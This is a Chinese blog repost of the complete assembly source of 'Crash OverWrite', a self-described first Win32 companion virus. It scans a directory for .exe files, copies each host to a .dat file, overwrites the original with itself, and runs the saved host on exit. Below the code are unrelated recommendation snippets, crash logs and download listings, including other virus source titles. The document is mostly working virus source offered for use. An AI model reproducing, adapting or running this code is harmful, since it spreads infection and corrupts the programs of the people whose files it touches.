Win32.Crash.asm

最新推荐文章于 2015-02-02 21:48:00 发布
转载 最新推荐文章于 2015-02-02 21:48:00 发布 · 926 阅读 · 0
文章标签:

#byte #crash #struct #file #path #im

博客展示了首个Win32病毒Crash OverWrite的代码。该病毒是伴随型病毒,能感染目录下所有文件并将受害文件重命名为.dat,无有效负载和武器,对DOS文件感染效果不佳。代码中涉及文件查找、复制、读写等操作。
comment *

Name: Crash OverWrite :-)
Coder: BeLiAL
Type: Companion
Anything else: NO

This is my first win32 virus.Its only a
companionvirus but it does his work very
well.Its perhaps coded not so fine but
im sure nobody will care.It infects all
files in the directory and renames
the victimfile to .dat .Perhaps i will make
infecting more files...
Its without payload and any weapons :)
It Doesnt infect dos-files correctly.
Greetings to the whole #vx channel on undernet

BeLiAL
*

.386
.model flat
Locals
Jumps

Extrn FindFirstFileA :PROC
Extrn FindNextFileA :PROC
Extrn CreateFileA :PROC
Extrn WriteFile :PROC
Extrn ReadFile :PROC
Extrn GlobalAlloc :PROC
Extrn GlobalFree :PROC
Extrn ExitProcess :PROC
Extrn WinExec :PROC
Extrn CopyFileA :PROC
Extrn CloseHandle :PROC
Extrn SetFilePointer :PROC
Extrn GetFileSize :PROC

.data

MAX_PATH EQU 0ffh
FALSE EQU 0
changeoffset EQU 094fh
winsize EQU 01h

FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends

WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>

memptr dd 0
counter1 dd 0
filehandle dd 0
filesize dd 00001000h
exefile db '*.exe',0
myname db 'crashoverwrite.exe',0
dd 0
dd 0
secbuffer dd 0
dd 0
dd 0
searchhandle dd 0
db '[Crash OverWrite] coded by BeLiAL'

.code

start:
push offset FindFileData
push offset exefile
call FindFirstFileA
mov searchhandle,eax
already_infected:
mov eax,dword ptr nFileSizeLow.FindFileData
cmp eax,00001000h
je find_next_victim
mov eax,offset cFileName.FindFileData
jmp find_dot1
find_next_victim:
push offset FindFileData
push searchhandle
call FindNextFileA
test eax,eax
jz reanimate
jmp already_infected
find_dot1:
cmp byte ptr ds:[eax],'.'
je next_step1
add eax,1
jmp find_dot1
next_step1:
add eax,1
push eax
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
mov ebx,offset cFileName.FindFileData
mov eax,offset secbuffer
find_dot2:
mov dh,byte ptr ds:[ebx]
cmp edx,0
je next_step2
mov byte ptr ds:[eax],dh
add ebx,1
add eax,1
jmp find_dot2
next_step2:
pop eax
push FALSE
push offset secbuffer
mov byte ptr ds:[eax],'e'
add eax,1
mov byte ptr ds:[eax],'x'
add eax,1
mov byte ptr ds:[eax],'e'
push offset cFileName.FindFileData
call CopyFileA
push FALSE
push offset cFileName.FindFileData
push offset myname
call CopyFileA
open_victim:
push 0
push 080h
push 3h
push 0h
push 0h
push 0c0000000h
push offset FindFileData.cFileName
Call CreateFileA
mov filehandle,eax
cmp eax,0ffffffffh
je find_next_victim
getmemory:
push filesize
push 0
Call GlobalAlloc ;get the memory
mov edx,eax
cmp eax,0
je close_file
push edx
copyinmemory:
push 0
push offset counter1
push filesize
push edx
push filehandle
Call ReadFile
pop edx
mov dword ptr memptr,edx ;for later use
add edx,changeoffset
mov eax,offset cFileName.FindFileData
modify_victim:
mov bh,byte ptr ds:[eax]
mov byte ptr ds:[edx],bh
cmp bh,0
je set_pointer
add eax,1
add edx,1
jmp modify_victim
set_pointer:
push 0
push 0
push 0
push filehandle
call SetFilePointer
copy_to_file:
push 0
push offset counter1
push filesize
push memptr
push filehandle
call WriteFile
close_file:
push filehandle
call CloseHandle
jmp find_next_victim
reanimate:
mov eax,offset myname
find_dot3:
mov bx,word ptr ds:[eax]
cmp bx,'e.'
je next_step3
cmp bx,'E.'
je next_step3
add eax,1
jmp find_dot3
next_step3:
add eax,1
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
add eax,1
mov byte ptr ds:[eax],00h
that_was_all:
push winsize
push offset myname
call WinExec
final:
push 0
call ExitProcess

ends
end start

MS10-073微软Windows内核Win32k.sys键盘布局本地提权漏洞 fix poc
爱杀之爪的矩阵
11-05 2713
第一次载入poc crash在这 eax=00000000 ebx=00000000 ecx=0000006b edx=e16edaac esi=00000244 edi=00000000 eip=8053af99 esp=b264e948 ebp=b264e94c iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023
oracle里面asm的作用,深入了解Oracle ASM(一):基础概念
weixin_42717586的博客
04-03 2229
相关文章链接:Oracle 自动存储管理概述自动存储管理 (ASM) 是 Oracle Database的一个特性,它为数据库管理员提供了一个在所有服务器和存储平台上均一致的简单存储管理接口。作为专门为 Oracle数据库文件创建的垂直集成文件系统和卷管理器,ASM 提供了直接异步 I/O 的性能以及文件系统的易管理性。ASM 提供了可节省 DBA时间的功能,以及管理动态数据库环境的灵活性,并且提...
Win32.Loicer, alias, Win32.Cervan
chengyixian7877的博客
03-09 190
This is my biggest PE virus, it's about 3500 lines, the virus binary size is more than 6K. Maybe this is my last virus. I've decided to exit from t...
Win32.Hatred.asm
gzfqh的专栏 →底层代码研究
04-11 2585
comment $????????????????????????????????????????????????????????????????????????????Win32.HatredV.1.0????????????????????????????????????????????????????????????????????????????by Lord Julus?????????
Win32_Zipling.asm
gzfqh的专栏 →底层代码研究
04-12 1816
; W32/ZipLing - ; ; First of all this is the source code to an I-Worm. I do not guarantee it works, although ; I have tested it on my system and it had seemed to work. I lost interest in it after a wh
Win32_Legacy.asm
gzfqh的专栏 →底层代码研究
04-12 4220
; [Win32.Legacy] - MultiThreaded/Poly/EPO/MMX/RDA/AntiAV/PE/RAR/ARJ,etc. ; Copyright (c) 1999 by Billy Belcebu/iKX ; ; [ Introduction ] ; ; This is a polymorphic heavily armoured multitask virus. Its
win98.Milennium.asm
gzfqh的专栏 →底层代码研究
04-12 4350
; 苒圹圹?苒圹圹?苒圹圹?; 圹?圹?圹?圹?圹?圹?; Win98.Milennium 苘苒圻 咣圹圹?圹圹圹?; by Benny/29A 圹圮苘?苘苘圹?圹?圹?; 圹圹圹?圹圹圹?圹?圹?; ; ; ;Authors description ;===================== ; ; ;Im very proud to introduce first multifiber
[转载]A Crash Course on the Depths of Win32 Structured Exception Handling
angbagangzhe065140的博客
02-02 265
转自:[已完工][经典文章翻译]A Crash Course on the Depths of Win32 Structured Exception Handling 原文题目: <<A Crash Course on the Depths of Win32Structured Exception Handling>> 原文地址: http://ww...
A Crash Course on the Depths of Win32 Structured Exception Handling
test
07-28 1047
http://www.cnblogs.com/suiyingjie/archive/2008/08/01/1258052.htmlA Crash Course on the Depths of Win32 Structured Exception Handling Matt Pi
ramework 版本: v4.0.30319 说明:由于未经处理的异常,进程终止, 异常信息: System.nvalidOperationException 在 System.Windows,Data,BindingExpression.UpdateTarget0 在 System.Windoows,Data.BindingExpressionBase.UpdateTargetCallback(System.Objec) 在System.Windoows.Threading,ExceptionWrapper.InternalRealcall(System.Delegate, System.object, lnt32)在E System.Windows,Threading,ExceptionWrapper.TryCatchWhen(SystemSystem.Object, Int32, System.Delegate)在System.Windows.Threading,DispatcherOperation.Invokelmpl0在E System.Threading.ExecutionContext.Runinternal(System.Threading.Execut2E System.Threading,.Executioncontext.Run(system,Threading.Executioncontex, System:Threading;contexcalback, system.object, goolean 2 System Thrending Execuioncontext.RunsystemThreading,.Execuiencentet, syaem, hregding conancbek, syaellobge 在MS.Internal.CulturePrervingExecutionContext.Run(MS.internal.CultuontextCallback, System.Object) 在 System.Windows,Threading.DispatcherOperation.lnvoke0 在 System.windows.Threading.Dispatcher.ProcessQueue0 2 System.windows.Threading:Dispatcher.wndproccok(inptr, int32, intptr, intptr, Boolcan ByRef 在 Ms.Win32.wndWrapper,wndproc(intPtr, nt32, intPtr, intPtr, Boolean ByRef 在Ms.Win32.HwndSubcass.DispatcherCallbackOper(System.Object) 在System.Windows.Threading.ExceptionWrapper.lr2 System,.windows.Threading.ExceptionWrepper.Trycatchwt在 System,Windows.Threading.Dispatcher,LegacyInvokepan,System.Delegate,System.Object, int32在 MS.Win32.HiwrIdProc(lntPtr, int32. IntPtr intPtr
09-10
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1"> ``` 7. **检查系统更新** - 安装 .NET Framework 4.0 最新累积更新: [KB4578966](https://support.microsoft.com/help/4578966) > **...
Qt mingw release版异常结束 crash信息捕捉和跟踪(含测试代码)
12-22
程序在debug可以正常运行,但是在release版后异常结束,系统又没有提供任何信息情况下,或者程序发布后在客户手中出现... 4,生成exe指应汇编代码objdump -S xxx.exe >aaa.asm;5,从生成的crash.log得到异常地址查代码
Log Name: Application Source: Windows Error Reporting Date: 8/28/2025 2:16:41 AM Event ID: 1001 Task Category: None Level: Information Keywords: Classic User: N/A Computer: DESKTOP-JON5UJ0 Description: Fault bucket 1899650801805437386, type 4 Event Name: APPCRASH Response: Not available Cab Id: 0 Problem signature: P1: MTFTester.exe P2: 2.3.3.3 P3: 66616e75 P4: mfc140u.dll P5: 14.32.31326.0 P6: 98bb104a P7: c0000005 P8: 00000000002b746a P9: P10: Attached files: \\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2745.tmp.mdmp \\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER286F.tmp.WERInternalMetadata.xml \\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER287F.tmp.xml \\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER287D.tmp.csv \\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER288E.tmp.txt These files may be available here: \\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_MTFTester.exe_a0be51b1f5b11e7e3d163515ae6e144d2a32f71_3994d89b_22832afe Analysis symbol: Rechecking for solution: 0 Report Id: 8c001f97-21ef-4c41-9989-1eb3d10d74b3 Report Status: 268435456 Hashed bucket: 09560dbc6b4a82ebea5cea56e6e629ca Cab Guid: 0 Event Xml: <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"> <System> <Provider Name="Windows Error Reporting" /> <EventID Qualifiers="0">1001</EventID> <Level>4</Level> <Task>0</Task> <Keywords>0x80000000000000</Keywords> <TimeCreated SystemTime="2025-08-27T18:16:41.425858100Z" /> <EventRecordID>10079</EventRecordID> <Channel>Application</Channel> <Computer>DESKTOP-JON5UJ0</Computer> <Security /> </System> <EventData> <Data>1899650801805437386</Data> <Data>4</Data> <Data>APPCRASH</Data> <Data>Not available</Data> <Data>0</Data> <Data>MTFTester.exe</Data> <Data>2.3.3.3</Data> <Data>66616e75</Data> <Data>mfc140u.dll</Data> <Data>14.32.31326.0</Data> <Data>98bb104a</Data> <Data>c0000005</Data> <Data>00000000002b746a</Data> <Data> </Data> <Data> </Data> <Data> \\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2745.tmp.mdmp \\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER286F.tmp.WERInternalMetadata.xml \\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER287F.tmp.xml \\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER287D.tmp.csv \\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER288E.tmp.txt</Data> <Data>\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_MTFTester.exe_a0be51b1f5b11e7e3d163515ae6e144d2a32f71_3994d89b_22832afe</Data> <Data> </Data> <Data>0</Data> <Data>8c001f97-21ef-4c41-9989-1eb3d10d74b3</Data> <Data>268435456</Data> <Data>09560dbc6b4a82ebea5cea56e6e629ca</Data> <Data>0</Data> </EventData> </Event>
08-29
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1"> type="win32" name="Microsoft.VC140.MFC" version="14.32.31326.0"/> <bindingRedirect oldVersion="0.0.0.0-14.99.99.99" newVersion="14...
加载出错显示APPCRASH
06-06
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> ...
二维码(53).zip
09-12
二维码(53).zip
it‘s a simplified library of ZXing that convenient to encode
最新发布
09-12
it‘s a simplified library of ZXing that convenient to encode and decode QR code.简化的Barcode Scanner二维码扫描工程,基于ZXing的开放工程.zip
一个java生成和扫描二维码的程序.zip
09-12
一个java生成和扫描二维码的程序.zip
用于随机Galerkin方法的Matlab_Octave工具箱_A Matlab_Octave toolbox for
09-12
用于随机Galerkin方法的Matlab_Octave工具箱_A Matlab_Octave toolbox for stochastic Galerkin methods.zip
基于Herbank和Gebhardt的SAFE模型,在西门子MRI系统中实现外周神经刺激(PNS)预测的Matlab实现
09-12
基于Herbank和Gebhardt的SAFE模型,在西门子MRI系统中实现外周神经刺激(PNS)预测的Matlab实现。_Matlab implementation of peripheral nerve stimulation (PNS) prediction at Siemens MRI systems based on the SAFE model by Herbank and Gebhardt..zip
RoboCup-Agent2D的环境配置_agent 2d-优快云博客.mhtml
09-12
RoboCup-Agent2D的环境配置_agent 2d-优快云博客.mhtml
Win32ASM实现常用控件教程
标题和描述中提到了“Window_Control”和“win32asm版本”的组合,这通常指的是在Windows操作系统中,使用Windows Assembly语言(win32asm)开发的一个名为“Window_Control”的软件或程序。该程序构建在Windows的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值